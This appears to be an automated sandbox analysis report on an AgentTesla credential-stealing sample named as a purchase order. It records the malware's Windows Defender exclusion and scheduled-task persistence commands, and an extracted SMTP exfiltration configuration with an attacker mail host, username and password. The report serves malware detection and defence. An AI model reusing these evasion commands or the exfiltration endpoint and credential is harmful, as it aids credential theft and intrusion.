

Windows Analysis Report
purchase order - PO-011024-201.exe

Overview

General Information

Sample name: purchase order - PO-011024-201.exe
Analysis ID: 1465995
MD5: 62b9604ff6ce5a82d5270041dcd2f3fe
SHA1: 880c5ce3bb2f391b8fa2ff5764ed0dc905c3a9e6
SHA256: e3308f1dd36bd61758447d5c6eb6e90adabc65e1119bbbe78537c3e3b622835c
Tags: AgentTesla, exe

Detection

AgentTesla
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Antivirus detection for URL or domain
Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for domain / URL
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Sigma detected: Scheduled temp file as task from temp location
Yara detected AgentTesla
Yara detected AntiVM3
.NET source code contains potential unpacker
.NET source code contains very large array initializations
.NET source code contains very large strings
AI detected suspicious sample
Adds a directory exclusion to Windows Defender
Contains functionality to log keystrokes (.Net Source)
Initial sample is a PE file and has a suspicious name
Installs a global keyboard hook
Loading BitLocker PowerShell Module
Machine Learning detection for dropped file
Machine Learning detection for sample
Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines)
Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet
Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)
Tries to harvest and steal browser information (history, passwords, etc)
Tries to harvest and steal ftp login credentials
Tries to steal Mail credentials (via file / registry access)
Uses schtasks.exe or at.exe to add and modify task schedules
Yara detected Generic Downloader
Allocates memory with a write watch (potentially for evading sandboxes)
Binary contains a suspicious time stamp
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates a window with clipboard capturing capabilities
Creates files inside the system directory
Creates or modifies windows services
Deletes files inside the Windows folder
Detected potential crypto function
Drops PE files
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May check the online IP address of the machine
May sleep (evasive loops) to hinder dynamic analysis
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Sigma detected: Powershell Defender Exclusion
Sigma detected: Suspicious Add Scheduled Task Parent
Sigma detected: Suspicious Outbound SMTP Connections
Sigma detected: Suspicious Schtasks From Env Var Folder
Stores large binary data to the registry
Uses 32bit PE files
Uses SMTP (mail sending)
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Yara detected Credential Stealer
Yara signature match

Classification

  • System is w10x64
  • purchase order - PO-011024-201.exe (PID: 7644 cmdline: "C:\Users\user\Desktop\purchase order - PO-011024-201.exe" MD5: 62B9604FF6CE5A82D5270041DCD2F3FE)
    • powershell.exe (PID: 7856 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\purchase order - PO-011024-201.exe" MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
      • conhost.exe (PID: 7864 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • powershell.exe (PID: 7908 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\jDCErdK.exe" MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
      • conhost.exe (PID: 7920 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • WmiPrvSE.exe (PID: 3068 cmdline: C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding MD5: 60FF40CFD7FB8FE41EE4FE9AE5FE1C51)
    • schtasks.exe (PID: 7936 cmdline: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\jDCErdK" /XML "C:\Users\user\AppData\Local\Temp\tmpA55D.tmp" MD5: 48C2FE20575769DE916F48EF0676A965)
      • conhost.exe (PID: 7988 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • RegSvcs.exe (PID: 8136 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe" MD5: 9D352BC46709F0CB5EC974633A0C3C94)
    • WMIADAP.exe (PID: 7936 cmdline: wmiadap.exe /F /T /R MD5: 1BFFABBD200C850E6346820E92B915DC)
  • jDCErdK.exe (PID: 7392 cmdline: C:\Users\user\AppData\Roaming\jDCErdK.exe MD5: 62B9604FF6CE5A82D5270041DCD2F3FE)
    • schtasks.exe (PID: 7944 cmdline: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\jDCErdK" /XML "C:\Users\user\AppData\Local\Temp\tmp981A.tmp" MD5: 48C2FE20575769DE916F48EF0676A965)
      • conhost.exe (PID: 7924 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • RegSvcs.exe (PID: 7988 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe" MD5: 9D352BC46709F0CB5EC974633A0C3C94)
  • cleanup
Name: Agent Tesla, AgentTesla
Description: A .NET based information stealer readily available to actors due to leaked builders. The malware is able to log keystrokes, can access the host's clipboard and crawls the disk for credentials or other valuable information. It has the capability to send information back to its C&C via HTTP(S), SMTP, FTP, or towards a Telegram channel.
Attribution: SWEED
Blogpost URLs: none listed
Link: https://malpedia.caad.fkie.fraunhofer.de/details/win.agent_tesla
Malware configuration: {"Exfil Mode": "SMTP", "Port": "25", "Host": "mail.iaa-airferight.com", "Username": "mail@iaa-airferight.com", "Password": "Asaprocky11"}
Source | Rule | Description | Author | Strings
0000000D.00000002.4107833892.000000000284C000.00000004.00000800.00020000.00000000.sdmp | JoeSecurity_AgentTesla_1 | Yara detected AgentTesla | Joe Security
00000008.00000002.1781239060.0000000002EE1000.00000004.00000800.00020000.00000000.sdmp | JoeSecurity_CredentialStealer | Yara detected Credential Stealer | Joe Security
00000008.00000002.1781239060.0000000002EE1000.00000004.00000800.00020000.00000000.sdmp | JoeSecurity_AgentTesla_1 | Yara detected AgentTesla | Joe Security
00000008.00000002.1781239060.0000000002F0B000.00000004.00000800.00020000.00000000.sdmp | JoeSecurity_AgentTesla_1 | Yara detected AgentTesla | Joe Security
00000008.00000002.1779040921.0000000000402000.00000040.00000400.00020000.00000000.sdmp | JoeSecurity_CredentialStealer | Yara detected Credential Stealer | Joe Security
Source | Rule | Description | Author | Strings
9.2.jDCErdK.exe.3da9108.1.unpack | JoeSecurity_CredentialStealer | Yara detected Credential Stealer | Joe Security
9.2.jDCErdK.exe.3da9108.1.unpack | JoeSecurity_AgentTesla_1 | Yara detected AgentTesla | Joe Security
9.2.jDCErdK.exe.3da9108.1.unpack | INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID | Detects executables referencing Windows vault credential objects. Observed in infostealers | ditekSHen
  • 0x316f7:$s1: 2F1A6504-0641-44CF-8BB5-3612D865F2E5
  • 0x31769:$s2: 3CCD5499-87A8-4B10-A215-608888DD3B55
  • 0x317f3:$s3: 154E23D0-C644-4E6F-8CE6-5069272F999F
  • 0x31885:$s4: 4BF4C442-9B8A-41A0-B380-DD4A704DDB28
  • 0x318ef:$s5: 77BC582B-F0A6-4E15-4E80-61736B6F3B29
  • 0x31961:$s6: E69D7838-91B5-4FC9-89D5-230D4D4CC2BC
  • 0x319f7:$s7: 3E0E35BE-1B77-43E7-B873-AED901B6275B
  • 0x31a87:$s8: 3C886FF3-2669-4AA2-A8FB-3F6759A77548
9.2.jDCErdK.exe.3de3b28.2.unpack | JoeSecurity_CredentialStealer | Yara detected Credential Stealer | Joe Security
9.2.jDCErdK.exe.3de3b28.2.unpack | JoeSecurity_AgentTesla_1 | Yara detected AgentTesla | Joe Security

System Summary

Source: Process started | Author: Florian Roth (Nextron Systems) | Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\purchase order - PO-011024-201.exe", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\purchase order - PO-011024-201.exe", CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\purchase order - PO-011024-201.exe", ParentImage: C:\Users\user\Desktop\purchase order - PO-011024-201.exe, ParentProcessId: 7644, ParentProcessName: purchase order - PO-011024-201.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\purchase order - PO-011024-201.exe", ProcessId: 7856, ProcessName: powershell.exe
Source: Process started | Author: Florian Roth (Nextron Systems) | Data: Command: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\jDCErdK" /XML "C:\Users\user\AppData\Local\Temp\tmp981A.tmp", CommandLine: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\jDCErdK" /XML "C:\Users\user\AppData\Local\Temp\tmp981A.tmp", CommandLine|base64offset|contains: *j, Image: C:\Windows\SysWOW64\schtasks.exe, NewProcessName: C:\Windows\SysWOW64\schtasks.exe, OriginalFileName: C:\Windows\SysWOW64\schtasks.exe, ParentCommandLine: C:\Users\user\AppData\Roaming\jDCErdK.exe, ParentImage: C:\Users\user\AppData\Roaming\jDCErdK.exe, ParentProcessId: 7392, ParentProcessName: jDCErdK.exe, ProcessCommandLine: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\jDCErdK" /XML "C:\Users\user\AppData\Local\Temp\tmp981A.tmp", ProcessId: 7944, ProcessName: schtasks.exe
Source: Network Connection | Author: frack113 | Data: DestinationIp: 46.175.148.58, DestinationIsIpv6: false, DestinationPort: 25, EventID: 3, Image: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe, Initiated: true, ProcessId: 8136, Protocol: tcp, SourceIp: 192.168.2.4, SourceIsIpv6: false, SourcePort: 49736
Source: Process started | Author: Florian Roth (Nextron Systems) | Data: Command: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\jDCErdK" /XML "C:\Users\user\AppData\Local\Temp\tmpA55D.tmp", CommandLine: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\jDCErdK" /XML "C:\Users\user\AppData\Local\Temp\tmpA55D.tmp", CommandLine|base64offset|contains: *j, Image: C:\Windows\SysWOW64\schtasks.exe, NewProcessName: C:\Windows\SysWOW64\schtasks.exe, OriginalFileName: C:\Windows\SysWOW64\schtasks.exe, ParentCommandLine: "C:\Users\user\Desktop\purchase order - PO-011024-201.exe", ParentImage: C:\Users\user\Desktop\purchase order - PO-011024-201.exe, ParentProcessId: 7644, ParentProcessName: purchase order - PO-011024-201.exe, ProcessCommandLine: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\jDCErdK" /XML "C:\Users\user\AppData\Local\Temp\tmpA55D.tmp", ProcessId: 7936, ProcessName: schtasks.exe
Source: Process started | Author: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements) | Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\purchase order - PO-011024-201.exe", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\purchase order - PO-011024-201.exe", CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\purchase order - PO-011024-201.exe", ParentImage: C:\Users\user\Desktop\purchase order - PO-011024-201.exe, ParentProcessId: 7644, ParentProcessName: purchase order - PO-011024-201.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\purchase order - PO-011024-201.exe", ProcessId: 7856, ProcessName: powershell.exe

Persistence and Installation Behavior

Source: Process started | Author: Joe Security | Data: Command: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\jDCErdK" /XML "C:\Users\user\AppData\Local\Temp\tmpA55D.tmp", CommandLine: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\jDCErdK" /XML "C:\Users\user\AppData\Local\Temp\tmpA55D.tmp", CommandLine|base64offset|contains: *j, Image: C:\Windows\SysWOW64\schtasks.exe, NewProcessName: C:\Windows\SysWOW64\schtasks.exe, OriginalFileName: C:\Windows\SysWOW64\schtasks.exe, ParentCommandLine: "C:\Users\user\Desktop\purchase order - PO-011024-201.exe", ParentImage: C:\Users\user\Desktop\purchase order - PO-011024-201.exe, ParentProcessId: 7644, ParentProcessName: purchase order - PO-011024-201.exe, ProcessCommandLine: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\jDCErdK" /XML "C:\Users\user\AppData\Local\Temp\tmpA55D.tmp", ProcessId: 7936, ProcessName: schtasks.exe
No Snort rule has matched



AV Detection

Source: http://mail.iaa-airferight.com | Avira URL Cloud: Label: malware
Source: 9.2.jDCErdK.exe.3de3b28.2.raw.unpack | Malware Configuration Extractor: Agenttesla {"Exfil Mode": "SMTP", "Port": "25", "Host": "mail.iaa-airferight.com", "Username": "mail@iaa-airferight.com", "Password": "Asaprocky11"}
Source: mail.iaa-airferight.com | Virustotal: Detection: 8%
Source: http://mail.iaa-airferight.com | Virustotal: Detection: 8%
Source: C:\Users\user\AppData\Roaming\jDCErdK.exe | ReversingLabs: Detection: 31%
Source: C:\Users\user\AppData\Roaming\jDCErdK.exe | Virustotal: Detection: 35%
Source: purchase order - PO-011024-201.exe | ReversingLabs: Detection: 31%
Source: purchase order - PO-011024-201.exe | Virustotal: Detection: 35%
Source: Submitted Sample | Integrated Neural Analysis Model: Matched 100.0% probability
Source: C:\Users\user\AppData\Roaming\jDCErdK.exe | Joe Sandbox ML: detected
Source: purchase order - PO-011024-201.exe | Joe Sandbox ML: detected
Source: purchase order - PO-011024-201.exe | Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
Source: unknown | HTTPS traffic detected: 172.67.74.152:443 -> 192.168.2.4:49734 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 172.67.74.152:443 -> 192.168.2.4:49737 version: TLS 1.2
Source: purchase order - PO-011024-201.exe | Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
Source: Binary string: GVAj.pdbSHA256 | source: purchase order - PO-011024-201.exe, jDCErdK.exe.0.dr
Source: Binary string: GVAj.pdb | source: purchase order - PO-011024-201.exe, jDCErdK.exe.0.dr

Networking

Source: Yara match | File source: 9.2.jDCErdK.exe.3de3b28.2.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0.2.purchase order - PO-011024-201.exe.40b2cc8.6.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0.2.purchase order - PO-011024-201.exe.40782a8.5.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 9.2.jDCErdK.exe.3da9108.1.raw.unpack, type: UNPACKEDPE
Source: Joe Sandbox View | IP Address: 46.175.148.58
Source: Joe Sandbox View | IP Address: 172.67.74.152
Source: Joe Sandbox View | ASN Name: ASLAGIDKOM-NETUA
Source: Joe Sandbox View | JA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
Source: unknown | DNS query: name: api.ipify.org
Source: unknown | DNS query: name: api.ipify.org
Source: unknown | DNS query: name: api.ipify.org
Source: global traffic | TCP traffic: 192.168.2.4:49736 -> 46.175.148.58:25
Source: global traffic | HTTP traffic detected: GET / HTTP/1.1 | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:99.0) Gecko/20100101 Firefox/99.0 | Host: api.ipify.org | Connection: Keep-Alive
Source: global traffic | HTTP traffic detected: GET / HTTP/1.1 | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:99.0) Gecko/20100101 Firefox/99.0 | Host: api.ipify.org | Connection: Keep-Alive
Source: unknown | UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown | UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: global traffic | HTTP traffic detected: GET / HTTP/1.1 | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:99.0) Gecko/20100101 Firefox/99.0 | Host: api.ipify.org | Connection: Keep-Alive
Source: global traffic | HTTP traffic detected: GET / HTTP/1.1 | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:99.0) Gecko/20100101 Firefox/99.0 | Host: api.ipify.org | Connection: Keep-Alive
Source: global traffic | DNS traffic detected: DNS query: api.ipify.org
Source: global traffic | DNS traffic detected: DNS query: mail.iaa-airferight.com
Source: RegSvcs.exe, 00000008.00000002.1781239060.0000000002F0B000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 0000000D.00000002.4107833892.000000000284C000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://mail.iaa-airferight.com
Source: purchase order - PO-011024-201.exe, 00000000.00000002.1693602582.00000000025A0000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000008.00000002.1781239060.0000000002E91000.00000004.00000800.00020000.00000000.sdmp, jDCErdK.exe, 00000009.00000002.1782894037.0000000002D71000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 0000000D.00000002.4107833892.00000000027DC000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: purchase order - PO-011024-201.exe, 00000000.00000002.1721501649.0000000005642000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0
Source: purchase order - PO-011024-201.exe, 00000000.00000002.1721501649.0000000005642000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://www.carterandcone.coml
Source: purchase order - PO-011024-201.exe, 00000000.00000002.1721501649.0000000005642000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://www.fontbureau.com
Source: purchase order - PO-011024-201.exe, 00000000.00000002.1721501649.0000000005642000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://www.fontbureau.com/designers
Source: purchase order - PO-011024-201.exe, 00000000.00000002.1721501649.0000000005642000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://www.fontbureau.com/designers/?
Source: purchase order - PO-011024-201.exe, 00000000.00000002.1721501649.0000000005642000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://www.fontbureau.com/designers/cabarga.htmlN
Source: purchase order - PO-011024-201.exe, 00000000.00000002.1721501649.0000000005642000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://www.fontbureau.com/designers/frere-user.html
Source: purchase order - PO-011024-201.exe, 00000000.00000002.1721501649.0000000005642000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://www.fontbureau.com/designers8
Source: purchase order - PO-011024-201.exe, 00000000.00000002.1721501649.0000000005642000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://www.fontbureau.com/designers?
Source: purchase order - PO-011024-201.exe, 00000000.00000002.1721501649.0000000005642000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://www.fontbureau.com/designersG
Source: purchase order - PO-011024-201.exe, 00000000.00000002.1721501649.0000000005642000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://www.fonts.com
Source: purchase order - PO-011024-201.exe, 00000000.00000002.1721501649.0000000005642000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://www.founder.com.cn/cn
Source: purchase order - PO-011024-201.exe, 00000000.00000002.1721501649.0000000005642000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://www.founder.com.cn/cn/bThe
Source: purchase order - PO-011024-201.exe, 00000000.00000002.1721501649.0000000005642000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://www.founder.com.cn/cn/cThe
Source: purchase order - PO-011024-201.exe, 00000000.00000002.1721501649.0000000005642000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://www.galapagosdesign.com/DPlease
Source: purchase order - PO-011024-201.exe, 00000000.00000002.1721501649.0000000005642000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://www.galapagosdesign.com/staff/dennis.htm
Source: purchase order - PO-011024-201.exe, 00000000.00000002.1721501649.0000000005642000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://www.goodfont.co.kr
Source: purchase order - PO-011024-201.exe, 00000000.00000002.1721501649.0000000005642000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://www.jiyu-kobo.co.jp/
Source: purchase order - PO-011024-201.exe, 00000000.00000002.1721501649.0000000005642000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://www.sajatypeworks.com
Source: purchase order - PO-011024-201.exe, 00000000.00000002.1721501649.0000000005642000.00000004.00000800.00020000.00000000.sdmp, purchase order - PO-011024-201.exe, 00000000.00000002.1720142571.0000000004F30000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://www.sakkal.com
Source: purchase order - PO-011024-201.exe, 00000000.00000002.1721501649.0000000005642000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://www.sandoll.co.kr
Source: purchase order - PO-011024-201.exe, 00000000.00000002.1721501649.0000000005642000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://www.tiro.com
Source: purchase order - PO-011024-201.exe, 00000000.00000002.1721501649.0000000005642000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://www.typography.netD
Source: purchase order - PO-011024-201.exe, 00000000.00000002.1721501649.0000000005642000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://www.urwpp.deDPlease
Source: purchase order - PO-011024-201.exe, 00000000.00000002.1721501649.0000000005642000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://www.zhongyicts.com.cn
Source: purchase order - PO-011024-201.exe, 00000000.00000002.1695549066.0000000003FF1000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000008.00000002.1779040921.0000000000402000.00000040.00000400.00020000.00000000.sdmp, jDCErdK.exe, 00000009.00000002.1786573650.0000000003DA9000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://account.dyn.com/
Source: purchase order - PO-011024-201.exe, 00000000.00000002.1695549066.0000000003FF1000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000008.00000002.1779040921.0000000000402000.00000040.00000400.00020000.00000000.sdmp, RegSvcs.exe, 00000008.00000002.1781239060.0000000002E91000.00000004.00000800.00020000.00000000.sdmp, jDCErdK.exe, 00000009.00000002.1786573650.0000000003DA9000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 0000000D.00000002.4107833892.00000000027DC000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://api.ipify.org
Source: RegSvcs.exe, 00000008.00000002.1781239060.0000000002E91000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 0000000D.00000002.4107833892.00000000027DC000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://api.ipify.org/
Source: RegSvcs.exe, 00000008.00000002.1781239060.0000000002E91000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 0000000D.00000002.4107833892.00000000027DC000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://api.ipify.org/t
Source: unknown | Network traffic detected: HTTP traffic on port 49734 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49737
Source: unknown | Network traffic detected: HTTP traffic on port 49737 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49734
Source: unknown | HTTPS traffic detected: 172.67.74.152:443 -> 192.168.2.4:49734 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 172.67.74.152:443 -> 192.168.2.4:49737 version: TLS 1.2

Key, Mouse, Clipboard, Microphone and Screen Capturing

Source: 0.2.purchase order - PO-011024-201.exe.40b2cc8.6.raw.unpack, abAX9N.cs | .Net Code: BFeixnEv
Source: 0.2.purchase order - PO-011024-201.exe.40782a8.5.raw.unpack, abAX9N.cs | .Net Code: BFeixnEv
Source: 9.2.jDCErdK.exe.3de3b28.2.raw.unpack, abAX9N.cs | .Net Code: BFeixnEv
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Windows user hook set: 0 keyboard low level C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Window created: window name: CLIPBRDWNDCLASS

System Summary

                    Source: 9.2.jDCErdK.exe.3da9108.1.unpack, type: UNPACKEDPEMatched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
                    Source: 9.2.jDCErdK.exe.3de3b28.2.unpack, type: UNPACKEDPEMatched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
                    Source: 8.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
                    Source: 0.2.purchase order - PO-011024-201.exe.40782a8.5.unpack, type: UNPACKEDPEMatched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
                    Source: 0.2.purchase order - PO-011024-201.exe.40b2cc8.6.unpack, type: UNPACKEDPEMatched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
                    Source: 9.2.jDCErdK.exe.3de3b28.2.raw.unpack, type: UNPACKEDPEMatched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
                    Source: 0.2.purchase order - PO-011024-201.exe.40b2cc8.6.raw.unpack, type: UNPACKEDPEMatched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
                    Source: 0.2.purchase order - PO-011024-201.exe.40782a8.5.raw.unpack, type: UNPACKEDPEMatched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
                    Source: 9.2.jDCErdK.exe.3da9108.1.raw.unpack, type: UNPACKEDPEMatched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
                    Source: 0.2.purchase order - PO-011024-201.exe.5b20000.8.raw.unpack, -Module-.csLarge array initialization: _200D_200D_202B_206F_206A_206B_202B_200B_200D_206D_200C_206B_206A_200B_202E_200C_200E_202A_200E_206D_206F_202D_206F_206D_206C_200F_206A_202D_206C_202B_206A_206F_202A_206A_200E_200F_200B_200F_202E_202D_202E: array initializer size 3088
                    Source: purchase order - PO-011024-201.exe, frm_login.csLong String: Length: 97210
                    Source: jDCErdK.exe.0.dr, frm_login.csLong String: Length: 97210
                    Source: initial sampleStatic PE information: Filename: purchase order - PO-011024-201.exe
                    Source: C:\Windows\System32\wbem\WMIADAP.exe | File created: C:\Windows\system32\wbem\Performance\WmiApRpl_new.h
                    Source: C:\Windows\System32\wbem\WMIADAP.exe | File created: C:\Windows\system32\wbem\Performance\WmiApRpl_new.ini
                    Source: C:\Windows\System32\wbem\WMIADAP.exe | File created: C:\Windows\inf\WmiApRpl\
                    Source: C:\Windows\System32\wbem\WMIADAP.exe | File created: C:\Windows\inf\WmiApRpl\WmiApRpl.h
                    Source: C:\Windows\System32\wbem\WMIADAP.exe | File created: C:\Windows\inf\WmiApRpl\WmiApRpl.ini
                    Source: C:\Windows\System32\wbem\WMIADAP.exe | File created: C:\Windows\inf\WmiApRpl\0009\
                    Source: C:\Windows\System32\wbem\WMIADAP.exe | File created: C:\Windows\system32\PerfStringBackup.TMP
                    Source: C:\Windows\System32\wbem\WMIADAP.exe | File deleted: C:\Windows\System32\wbem\Performance\WmiApRpl.h
                    Source: C:\Users\user\Desktop\purchase order - PO-011024-201.exe | Code function: 0_2_0084D5BC
                    Source: C:\Users\user\Desktop\purchase order - PO-011024-201.exe | Code function: 0_2_05062538
                    Source: C:\Users\user\Desktop\purchase order - PO-011024-201.exe | Code function: 0_2_05062548
                    Source: C:\Users\user\Desktop\purchase order - PO-011024-201.exe | Code function: 0_2_05066718
                    Source: C:\Users\user\Desktop\purchase order - PO-011024-201.exe | Code function: 0_2_05066728
                    Source: C:\Users\user\Desktop\purchase order - PO-011024-201.exe | Code function: 0_2_050626DB
                    Source: C:\Users\user\Desktop\purchase order - PO-011024-201.exe | Code function: 0_2_05066172
                    Source: C:\Users\user\Desktop\purchase order - PO-011024-201.exe | Code function: 0_2_05066178
                    Source: C:\Users\user\Desktop\purchase order - PO-011024-201.exe | Code function: 0_2_05066F78
                    Source: C:\Users\user\Desktop\purchase order - PO-011024-201.exe | Code function: 0_2_05066F88
                    Source: C:\Users\user\Desktop\purchase order - PO-011024-201.exe | Code function: 0_2_0506DEB8
                    Source: C:\Users\user\Desktop\purchase order - PO-011024-201.exe | Code function: 0_2_050609E8
                    Source: C:\Users\user\Desktop\purchase order - PO-011024-201.exe | Code function: 0_2_050609F8
                    Source: C:\Users\user\Desktop\purchase order - PO-011024-201.exe | Code function: 0_2_0506FA50
